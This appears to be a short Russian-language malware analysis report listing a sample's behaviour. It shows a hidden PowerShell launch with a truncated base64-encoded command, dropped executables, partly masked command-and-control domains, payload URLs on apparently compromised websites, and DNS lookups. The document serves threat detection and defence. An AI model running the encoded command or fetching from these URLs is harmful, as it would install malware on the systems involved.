Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAGwAegBiAHIAegB1AHQAaABjAGQAcQB6AD0AJwBGAGYAcgBlAHAAZwBxAGkAJwA7ACQAUABrAHoAbgBlAGQAdQB0AHIAIAA9ACAAJwAxADcANwAnADsAJABSAHkAdwB6AGMAdABpAGwAZgB6AGoAbgBlAD0AJwBSAGIAZABtAHQAYQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\829784.cvr
- %HOMEPATH%\177.exe
- %HOMEPATH%\177.exe
- 'sh##oys.com':80
- 've###licom.com':80
- 'al####endiaye.com':80
- 'al####endiaye.com':443
- http://sh##oys.com/_old/bvGej/
- http://sh##oys.com/cgi-sys/suspendedpage.cgi
- http://www.ve###licom.com/facturation/qgm0t/
- http://www.al####endiaye.com/wp-content/f3hs6j/
- 'al####endiaye.com':443
- DNS ASK ya####rebastan.com
- DNS ASK bi###zonebd.com
- DNS ASK sh##oys.com
- DNS ASK ve###licom.com
- DNS ASK al####endiaye.com